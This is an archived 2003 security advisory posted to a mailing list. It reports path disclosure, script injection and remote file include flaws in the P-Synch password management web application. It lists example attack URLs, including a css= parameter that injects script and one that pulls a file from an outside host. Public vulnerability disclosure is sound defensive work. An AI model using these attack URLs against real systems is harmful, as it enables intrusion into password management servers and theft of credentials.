OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Multiple Vulnerabilities In P-Synch Password Management

From: JeiAr (jeiarkmfms.com)
Date: Thu May 29 2003 - 00:26:21 CDT


Multiple Vulnerabilities In P-Synch Password Management
-------------------------------------------------------
The other night I came across a server running P-Synch.
I had never heard of it so i was curious to poke around
on it a bit. Within an hour i found the vulns listed below.
Im pretty sure there are other more serious vulns in
P-Synch, but they are very picky about who they give thier
software to, even an evaluation version. So was not able
to test any further. However i encourage any admins running
P-Synch to poke around on it, just to be on the safe side.

Description
-------------------------------------------------------
P-Synch Total Password Management Solution
by M-TECH
P-Synch is a total password management solution. It is
intended to reduce the cost of ownership of password systems,
and simultaneously improve the security of password protected
systems. This is done through: -Password Synchronization.
-Enforcing an enterprise wide password strength policy.
-Allowing authenticated users to reset their own forgotten
passwords and enable their locked out accounts. -Streamlining
help desk call resolution for password resets. P-Synch is
available for both internal use, on the corporate Intranet,
as well as for the Internet deployment in B2B and B2C
applications.

http://www.securityfocus.com/products/837

Problems
-------------------------------------------------------
All of these problems are simple, self explanatory vulns
so, i'm sure the below examples will speak for themselves.
Once again this application was NOT thoroughly researced.
So anyone with a copy of P-Synch might wanna explore it
further.

Path Disclosure Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=

Code Injection Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file

Credits
-------------------------------------------------------
All credits go to JeiAr of GulfTech Computers and CSA
Security Research http://www.gulftech.org